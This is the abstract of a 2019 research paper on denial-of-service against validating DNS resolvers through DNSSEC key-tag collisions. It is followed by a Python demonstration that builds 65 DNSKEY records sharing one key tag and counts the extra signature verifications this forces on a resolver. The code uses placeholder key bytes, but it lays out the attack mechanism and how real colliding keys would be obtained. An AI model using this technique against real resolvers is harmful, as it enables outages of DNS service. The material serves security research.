DoS attack on recursive resolvers with DNSSEC key-tag collisions

Bleeker, D.A. (2019)

DNSSEC was introduced to strengthen DNS: it lets resolvers and end-users validate the integrity and origin of responses by means of digital signatures. To speed up signature verification, key tags were introduced, a 16-bit value carried in each RRSIG that lets a validator narrow down which DNSKEY to try. In this paper we analyse an attack that uses key-tag collisions to generate enough computational overhead to render a recursive resolver unavailable (a DoS attack). To simulate the attack, a zone containing 65 keys that share the same key tag was set up on an authoritative name server, together with a validating resolver (Unbound and BIND) and an attacker. This paper concludes that a DoS attack on a recursive resolver using DNSSEC key-tag collisions is viable, at least in theory.
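The mechanism the abstract describes, as an added example that is not code from the paper: the key tag of RFC 4034 Appendix B is a 16-bit sum over the DNSKEY RDATA, so the set of keys a validator has to try for one RRSIG is only as narrow as that sum. The block computes key tags, constructs a DNSKEY RRset in which every key has the same tag, and counts how many signature verifications a validator performs for a forged RRSIG (all candidates fail, so every one is tried). Assumptions: random bytes stand in for real public-key material, the collision is produced by tuning the last two key bytes (a constructed shortcut; with real key pairs an attacker regenerates keys until the tag matches, roughly 65536 attempts per key), algorithm 13 and flags 257 are used for every key, and a single owner name is implied.

```python
import random
import struct


def dnssec_key_tag(rdata: bytes) -> int:
    """Key tag per RFC 4034 Appendix B.1, computed over the full DNSKEY RDATA
    (flags | protocol | algorithm | public key). Not valid for algorithm 1."""
    ac = 0
    for i, b in enumerate(rdata):
        ac += b if (i & 1) else (b << 8)   # even offsets are the high byte
    ac += (ac >> 16) & 0xFFFF              # fold the carry back in once
    return ac & 0xFFFF


def dnskey_rdata(flags: int, protocol: int, algorithm: int, pubkey: bytes) -> bytes:
    """Wire-format DNSKEY RDATA."""
    return struct.pack("!HBB", flags, protocol, algorithm) + pubkey


def forge_colliding_rdata(target_tag: int, count: int, key_len: int = 64, seed: int = 1):
    """Return `count` distinct DNSKEY RDATAs whose key tag equals target_tag.

    Constructed shortcut: the public key is random bytes and its final two
    bytes are chosen to hit the tag. Real key pairs cannot be edited this way;
    the attacker would instead regenerate keys until the tag matches."""
    assert key_len % 2 == 0, "prefix must be an even number of bytes"
    rng = random.Random(seed)
    out = []
    while len(out) < count:
        prefix = dnskey_rdata(257, 3, 13, rng.randbytes(key_len - 2))
        ac = 0
        for i, b in enumerate(prefix):
            ac += b if (i & 1) else (b << 8)
        # The last two bytes sit at an even/odd offset pair, so together they
        # add exactly one 16-bit word v to the accumulator.
        for v in range(0x10000):
            t = ac + v
            if ((t + ((t >> 16) & 0xFFFF)) & 0xFFFF) == target_tag:
                out.append(prefix + v.to_bytes(2, "big"))
                break
        # One tag value per prefix is unreachable because of the carry fold;
        # in that case the loop simply draws a fresh prefix.
    return out


def candidate_keys(dnskey_rrset, rrsig_key_tag: int, rrsig_algorithm: int):
    """Keys a validator must try for one RRSIG (RFC 4035 section 5.3.1):
    Zone Key flag (bit 7) set, matching algorithm, matching key tag."""
    return [
        k for k in dnskey_rrset
        if ((k[0] << 8) | k[1]) & 0x0100
        and k[3] == rrsig_algorithm
        and dnssec_key_tag(k) == rrsig_key_tag
    ]


def verification_attempts(dnskey_rrset, rrsig_key_tag: int, rrsig_algorithm: int) -> int:
    """Worst case for a forged RRSIG: no candidate verifies, so every candidate
    costs one public-key signature verification."""
    return len(candidate_keys(dnskey_rrset, rrsig_key_tag, rrsig_algorithm))


def honest_zone(seed: int = 7):
    """Constructed benign DNSKEY RRset: one KSK and one ZSK with distinct tags."""
    rng = random.Random(seed)
    while True:
        ksk = dnskey_rdata(257, 3, 13, rng.randbytes(64))
        zsk = dnskey_rdata(256, 3, 13, rng.randbytes(64))
        if dnssec_key_tag(ksk) != dnssec_key_tag(zsk):
            return [ksk, zsk]


if __name__ == "__main__":
    target = 0x1234
    attack_zone = forge_colliding_rdata(target, 65)   # the paper's 65-key zone
    print("colliding keys:", len(attack_zone), "all tag 0x%04x" % target)
    print("verifications per forged RRSIG (attack zone):",
          verification_attempts(attack_zone, target, 13))
    benign = honest_zone()
    print("verifications per RRSIG (honest zone):",
          verification_attempts(benign, dnssec_key_tag(benign[1]), 13))
```

The count returned by `verification_attempts` is the per-RRSIG cost the abstract refers to: with a single key per tag a bogus signature costs one verification and is rejected, whereas with 65 keys sharing the tag the resolver performs 65 verifications before it can reject the same signature, and the attacker can trigger that work with each query.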